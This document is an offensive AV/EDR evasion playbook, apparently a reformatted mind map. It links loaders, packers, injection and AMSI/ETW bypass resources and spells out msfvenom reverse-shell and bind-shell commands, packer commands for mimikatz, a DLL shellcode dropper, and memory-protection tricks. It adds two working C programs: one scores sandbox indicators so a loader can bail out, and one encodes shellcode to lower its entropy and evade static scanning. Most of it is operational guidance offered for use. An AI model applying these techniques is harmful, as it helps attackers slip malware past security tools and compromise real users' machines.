Advanced AV/EDR Evasion Techniques

The document contains links to various articles about bypassing antivirus and security protections through techniques like packing, polymorphism, signature hiding, return-oriented programming, bypassing Control Flow Guard on Windows 10, and injecting code using asynchronous procedure calls and NtQueueApcThreadEx gadgets.

Credits: @Jenaye_fr, LeDocteurDesBits, michmich1000, @Zabannn

Bypass AV/EDR
Branches: Dropper, Manual loader, Automatic loader, Generate shellcode, Manual obfuscation, Automatic obfuscation, Process injection, Detect virtual machines (Sandbox), From PE to shellcode, From alive beacon, Extensions

Manual obfuscation
- Static
  - Packing: https://pentester.blog/?p=39
  - Polymorph: https://www.exploit-db.com/papers/13874
  - Signature hiding: https://www.ired.team/offensive-security/defense-evasion/av-bypass-with-metasploit-templates
  - ROP: https://improsec.com/tech-blog/bypassing-control-flow-guard-on-windows-10-part-ii
  - CFG: https://joshpitts.medium.com/hooking-control-flow-guard-cfg-for-fun-and-profit-31f951485545
  - CFG flattening: https://citeseerx.ist.psu.edu/document?repid=rep1&type=pdf&doi=ade1cc22ee994c1b353326ae4cedccd29f33b8d0 ; http://ac.inf.elte.hu/Vol_030_2009/003.pdf
  - Change logo/icon: https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/resources?redirectedfrom=MSDN
  - Change date of compilation
  - Pro tip: shellcode run through three open-source packers is more likely to be caught than shellcode obfuscated by hand; public packer stubs are well known to AV vendors.
- Dynamic
  - Bypass AMSI: https://rastamouse.me/memory-patching-amsi-bypass/ ; https://thehackernews.com/2017/12/malware-powershell-amsi-and-logging-evasion/ ; https://www.pentestpartners.com/security-blog/patchless-amsi-bypass-using-sharpblock/
  - Disable ETW: https://www.mdsec.co.uk/2020/03/hiding-your-net-etw/
  - Direct syscalls: https://medium.com/@merasor07/av-edr-evasion-using-direct-system-calls-user-mode-vs-kernel-mode-fad2fdfed01a ; https://www.cyberbit.com/blog/endpoint-security/malware-mitigation-when-direct-system-calls-are-used/ ; https://www.cyberbit.com/endpoint-security/malware-mitigation-when-direct-system-calls-are-used/
    - Remote thread
    - User APC
  - DInvoke: https://github.com/TheWover/DInvoke ; https://thewover.github.io/Dynamic-Invoke/
  - Avoid RWX: allocate the region as RW, write the shellcode into it, then reprotect it to RX, and only then start the thread. This way the region is never RWX, the permission combination memory scanners flag.
  - Delayed execution: https://evasions.checkpoint.com/techniques/timing.html#delayed-execution
    - WaitForSingleObjectEx
    - Foliage
    - Ekko: a small sleep obfuscation technique that uses the CreateTimerQueueTimer Win32 API
    - DeathSleep: https://github.com/janoglezcampos/DeathSleep

Process injection (https://attack.mitre.org/techniques/T1055/)
- CRT (CreateRemoteThread), with a suspended thread: https://damonmohammadbagher.medium.com/bypassing-anti-virus-by-creating-remote-thread-into-target-process-45f145b2ac7a ; https://sevrosecurity.com/2020/04/08/process-injection-part-1-createremotethread/
- APC (Asynchronous Procedure Call): https://subscription.packtpub.com/book/security/9781789610789/8/ch08lvl1sec50/executing-the-inject-code-using-apc-queuing ; https://github.com/LloydLabs/ntqueueapcthreadex-ntdll-gadget-injection ; https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/
- Process hollowing: https://www.ired.team/offensive-security/code-injection-process-injection/process-hollowing-and-pe-image-relocations#relocation
- Thread execution hijacking: https://attack.mitre.org/techniques/T1055/003/
- PSC (Ptrace System Calls)
- Process Doppelganging: https://www.mdsec.co.uk/2018/06/exploring-process-doppelganging.html
- Reflective DLL injection: https://disman.tl/2015/01/30/an-improved-reflective-dll-injection-technique.html ; https://github.com/fancycode/MemoryModule
- DLL injection: https://www.ired.team/offensive-security/code-injection-process-injection/dll-injection
- DLL Sideloading & Proxying: https://book.hacktricks.xyz/windows-hardening/windows-av-bypass#dll-sideloading-and-proxying
- COM Hijack: https://www.mdsec.co.uk/2022/04/process-injection-via-component-object-model-com-irundowndocallback/ ; https://0xpat.github.io/Abusing_COM_Objects/

Manual loader
- Description: 1. allocate memory; 2. move the shellcode into that memory; 3. execute the shellcode
- C++: https://github.com/TheD1rkMtr/D1rkLrd ; https://github.com/xuanxuan0/DripLoader ; https://github.com/Hagrid29/PELoader ; https://github.com/vic4key/QLoader ; https://blog.securityevaluators.com/creating-av-resistant-malware-part-1-7604b83ea0c0
- C: https://github.com/cribdragg3r/Alaris ; https://github.com/trustedsec/COFFLoader ; https://github.com/CMEPW/Selha/blob/main/C/aes-loader-stageless.c ; https://github.com/reveng007/ReflectiveNtdll
- python: https://github.com/icyguider/Shhhloader
- Nim: https://github.com/aeverj/NimShellCodeLoader ; https://github.com/sh3d0ww01f/nim_shellloader
- Go: https://github.com/EddieIvan01/gld ; https://github.com/zha0gongz1/DesertFox
- Rust: https://github.com/b1tg/rs_shellcode ; https://github.com/r4ime/shellcode_loader ; https://github.com/cr7pt0pl4gu3/Pestilence
- Crystal: https://github.com/js-on/WeaponizeCrystal/blob/main/shellcode_loader/shellcode_loader.cr
- .NET: https://sevrosecurity.com/2019/05/25/bypass-windows-defender-with-a-simple-shell-loader/
- https://www.purpl3f0xsecur1ty.tech/2021/03/30/av_evasion.html
Dropper
- Network: C2 by DNS; P2P (hide the C2's IP); HTTPS
- Minimal dropper that loads the shellcode packaged as a DLL (loading it runs the DLL's DllMain, which is where the payload lives):

    #include <iostream>
    #include <Windows.h>

    int main(void) {
        // LoadLibraryA takes a narrow string whether or not UNICODE is defined
        HMODULE hMod = LoadLibraryA("shellcode.dll");
        if (hMod == nullptr) {
            std::cout << "Failed to load shellcode.dll" << std::endl;
            return 1;
        }
        return 0;
    }

Extensions: Exe, Hta, Cpl, Dll, Link, Office macro (https://github.com/sevagas/macro_pack)

From PE to shellcode
- https://github.com/S4ntiagoP/donut/tree/syscalls
- https://github.com/hasherezade/pe_to_shellcode
- https://github.com/monoxgas/sRDI

From alive beacon
- Cobalt: BoF (Beacon object file): https://github.com/trustedsec/CS-Situational-Awareness-BOF ; https://github.com/CMEPW/bof-collection/
  - From .NET to BoF: https://github.com/CCob/BOF.NET
- Havoc: dotnet (object file)

Generate shellcode
- msfvenom:

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<SERVER> LPORT=<PORT> -f raw
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 --encrypt rc4 --encrypt-key thisisakey -f dll
    msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 30 RHOST=10.0.0.68 LPORT=9050 -f c | tr -d '"' | tr -d '\n' | more

- C2 (Cobalt, Havoc, whatever)
- ASM: https://nytrosecurity.com/2019/06/30/writing-shellcodes-for-windows-x64/ ; https://github.com/ReversingID/Shellcode-Loader/tree/master/windows
- C: https://vxug.fakedoma.in/papers/VXUG/Exclusive/FromaCprojectthroughassemblytoshellcodeHasherezade.pdf
- sgn: https://github.com/EgeBalci/sgn/
- monomorph: https://github.com/DavidBuchanan314/monomorph
- Staged and stageless: by definition, a staged payload is the payload delivered in addition to a small first piece (the stager), so there are several exchanges (often 2) between the client and the server before the full payload runs. If you use meterpreter, set the following in the handler:

    set EnableStageEncoding true
    set StageEncoder x64/xor_dynamic

Detect virtual machines (Sandbox)
- Software
  - Count the number of processes: if it is >= 40, the host is probably not a sandbox VM
  - User interaction: show a MessageBoxW and wait for the click
  - Check for internet access
  - Datetime at compilation: compare the current date with the build timestamp
  - Check the computer name: VM = DESKTOP-[0-9A-Z]{7}
  - CPUID timing
  - https://github.com/CMEPW/bof-collection/blob/main/src/checkVM/checkVM2.c
- Hardware: a typical user workstation has a processor with at least 2 cores, a minimum of 2 GB of RAM and a 100 GB hard drive
- OSX: https://evasions.checkpoint.com/techniques/macos.html#macos-sandbox-methods
- Tools: https://github.com/a0rtega/pafish
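The sandbox checks listed above (process count, default computer name, minimum cores/RAM/disk, internet access) are individually weak, so a loader combines them. This is an added example of that decision logic, not code from the page or from checkVM2.c or pafish. The thresholds are the page's (>= 40 processes, DESKTOP-[0-9A-Z]{7}, 2 cores, 2 GB, 100 GB); the host_facts struct, treating "no internet" as an indicator, equal weights and the cutoff of two indicators are assumptions for illustration. Gathering the facts (NtQuerySystemInformation, GetComputerNameW, GlobalMemoryStatusEx, GetDiskFreeSpaceExW on Windows) is left to the caller so the logic runs anywhere.

```c
/* Added example: scoring the page's sandbox heuristics. Not from the page. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Facts about the host, collected by platform-specific code elsewhere (assumed shape). */
typedef struct {
    unsigned cpu_cores;
    unsigned ram_mb;
    unsigned disk_gb;
    unsigned process_count;
    const char *computer_name;
    int internet_reachable;   /* 1 if an outbound connectivity check succeeded */
} host_facts;

/* Exact match for the page's default-hostname pattern DESKTOP-[0-9A-Z]{7}. */
int is_default_desktop_name(const char *name)
{
    const char *prefix = "DESKTOP-";
    size_t plen = strlen(prefix);
    if (name == NULL || strncmp(name, prefix, plen) != 0)
        return 0;
    const char *tail = name + plen;
    if (strlen(tail) != 7)
        return 0;
    for (int i = 0; i < 7; i++) {
        unsigned char c = (unsigned char)tail[i];
        if (!(isdigit(c) || (c >= 'A' && c <= 'Z')))
            return 0;
    }
    return 1;
}

/* Number of "looks like a sandbox" indicators that tripped (0 = workstation-like). */
int sandbox_score(const host_facts *h)
{
    int score = 0;
    /* Hardware: a typical workstation has >= 2 cores, >= 2 GB RAM, >= 100 GB disk. */
    if (h->cpu_cores < 2)       score++;
    if (h->ram_mb < 2048)       score++;
    if (h->disk_gb < 100)       score++;
    /* Software: fewer than 40 processes is unusual on a real desktop. */
    if (h->process_count < 40)  score++;
    /* A never-renamed DESKTOP-XXXXXXX hostname is common in analysis VMs. */
    if (is_default_desktop_name(h->computer_name)) score++;
    /* Assumption: an isolated host counts as one indicator. */
    if (!h->internet_reachable) score++;
    return score;
}

/* Loader decision: bail out when two or more indicators trip (assumed cutoff). */
int looks_like_sandbox(const host_facts *h)
{
    return sandbox_score(h) >= 2;
}

int main(void)
{
    /* Constructed sample hosts, not real measurements. */
    host_facts vm = { 1, 1024, 40, 25, "DESKTOP-AB12CD3", 0 };
    host_facts ws = { 8, 16384, 512, 180, "LAPTOP-JSMITH", 1 };
    printf("vm: score %d, sandbox=%d\n", sandbox_score(&vm), looks_like_sandbox(&vm));
    printf("ws: score %d, sandbox=%d\n", sandbox_score(&ws), looks_like_sandbox(&ws));
    return 0;
}
```

A single indicator on its own gives false positives (a developer's 1-vCPU cloud box, an air-gapped workstation), which is why the decision counts them. The inverse failure is the one to remember: a sandbox configured with 4 cores, 8 GB and a renamed host passes all six checks, which is why the page also lists CPUID timing and a MessageBoxW click as checks that measure behaviour rather than inventory.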
Automatic loader
- https://github.com/phra/PEzor
- https://github.com/klezVirus/inceptor
- https://github.com/optiv/Ivy
- https://medium.com/securebit/bypassing-av-through-metasploit-loader-64-bit-9abe55e3e0c8
- Packing
  - https://github.com/govolution/avet
  - https://github.com/Nariod/RustPacker
  - https://github.com/upx/upx
  - Hyperion:

        wine hyperion.exe /root/payloads/shellter/shellter_putty_reverse_x86.exe

Automatic obfuscation
- Static
  - Obfuscation: https://github.com/danielbohannon/Invoke-Obfuscation ; https://github.com/klezVirus/Chameleon ; https://github.com/tokyoneon/Chimera
  - Signature hiding: https://github.com/optiv/ScareCrow ; https://github.com/paranoidninja/CarbonCopy ; https://gist.github.com/snovvcrash/123945e8f06c7182769846265637fedb

        ScareCrow -I /Path/To/ShellCode -d facebook.com

  - LOLBIN: RemComSvc
  - Entropy: https://github.com/kleiton0x00/Shelltropy
  - AMSI Bypass: https://gist.github.com/tandasat/e595c77c52e13aaee60e1e8b65d2ba32
  - Disable ETW: https://github.com/Soledge/BlockEtw ; https://github.com/CCob/SharpBlock
  - Freeze: https://github.com/optiv/Freeze

        Freeze -I /PathToShellcode -encrypt -sandbox -o packed.exe

  - PEzor: https://github.com/phra/PEzor

        PEzor.sh -sgn -unhook -antidebug -text -syscalls -sleep=120 mimikatz/x64/mimikatz.exe -z 2

- Dynamic
  - Indirect syscall: https://github.com/optiv/ScareCrow ; https://github.com/klezVirus/SysWhispers3 ; https://github.com/jthuraisamy/SysWhispers2
  - Disable AV: https://github.com/APTortellini/unDefender
  - Block DLL: https://github.com/CCob/SharpBlock
  - Detect virtual machines: https://github.com/a0rtega/pafish
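The "Entropy" entry above points at Shelltropy without saying what the problem is: encrypted or packed shellcode is close to 8 bits of entropy per byte, and a section or blob that dense is itself a static heuristic hit. This added example, not from the page or from Shelltropy, shows the measurement AV engines make and one generic way to get under it: splitting each byte into two nibbles stored as letters, which caps the encoded blob at 4 bits per byte at the cost of doubling its size. The xorshift32 "encrypted shellcode" is a constructed sample, and the nibble encoding is an illustration of the principle rather than Shelltropy's own scheme.

```c
/* Added example: Shannon entropy and a 4-bit cap via nibble splitting. Not from the page. */
#include <stdio.h>
#include <string.h>

/* log2 without libm: normalise into [1,2), then ln(x) by the atanh series. */
static double log2_nolibm(double x)
{
    int e = 0;
    while (x < 1.0)  { x *= 2.0; e--; }
    while (x >= 2.0) { x /= 2.0; e++; }
    double y = (x - 1.0) / (x + 1.0), y2 = y * y, term = y, sum = 0.0;
    for (int k = 1; k < 60; k += 2) { sum += term / k; term *= y2; }
    return e + 2.0 * sum / 0.6931471805599453;   /* ln(x) / ln(2) */
}

/* Bits of entropy per byte: 0.0 for a single repeated value, 8.0 for uniform over 256. */
double shannon_entropy(const unsigned char *buf, size_t len)
{
    if (len == 0) return 0.0;
    size_t counts[256] = { 0 };
    for (size_t i = 0; i < len; i++) counts[buf[i]]++;
    double h = 0.0;
    for (int b = 0; b < 256; b++) {
        if (counts[b] == 0) continue;
        double p = (double)counts[b] / (double)len;
        h -= p * log2_nolibm(p);
    }
    return h;
}

/* Store each byte as two symbols 'a'..'p' (high nibble, low nibble).
 * Output has 2*len bytes drawn from 16 values, so its entropy is <= 4 bits. */
size_t nibble_encode(const unsigned char *in, size_t len, unsigned char *out)
{
    for (size_t i = 0; i < len; i++) {
        out[2 * i]     = (unsigned char)('a' + (in[i] >> 4));
        out[2 * i + 1] = (unsigned char)('a' + (in[i] & 0x0f));
    }
    return 2 * len;
}

/* Inverse of nibble_encode; the loader runs this before handing bytes to the RW region. */
size_t nibble_decode(const unsigned char *in, size_t len, unsigned char *out)
{
    for (size_t i = 0; i + 1 < len; i += 2)
        out[i / 2] = (unsigned char)(((in[i] - 'a') << 4) | (in[i + 1] - 'a'));
    return len / 2;
}

/* Constructed stand-in for encrypted shellcode: xorshift32 output, which is
 * spread evenly over 0..255 and therefore scores close to 8 bits. */
void fill_pseudo_random(unsigned char *buf, size_t len, unsigned seed)
{
    for (size_t i = 0; i < len; i++) {
        seed ^= seed << 13;
        seed ^= seed >> 17;
        seed ^= seed << 5;
        buf[i] = (unsigned char)(seed & 0xff);
    }
}

int main(void)
{
    unsigned char blob[4096], enc[8192], dec[4096];
    fill_pseudo_random(blob, sizeof blob, 0x1337u);
    size_t n = nibble_encode(blob, sizeof blob, enc);
    printf("raw:     %.3f bits/byte over %zu bytes\n", shannon_entropy(blob, sizeof blob), sizeof blob);
    printf("encoded: %.3f bits/byte over %zu bytes\n", shannon_entropy(enc, n), n);
    nibble_decode(enc, n, dec);
    printf("roundtrip %s\n", memcmp(blob, dec, sizeof blob) == 0 ? "ok" : "FAILED");
    return 0;
}
```

Two things follow from the numbers. Encoding buys a lower score on the blob, not invisibility: a resource of 8 KB containing only the letters a..p is its own signature, and the decoder loop sits in plain view, which is why tools in this branch hide the encoded bytes among genuinely low-entropy data rather than in a bare array. And because the 4-bit cap is a property of the alphabet size, a base64-style 6-bit alphabet, or bytes interleaved with fixed filler, trade size against entropy in exactly the same way.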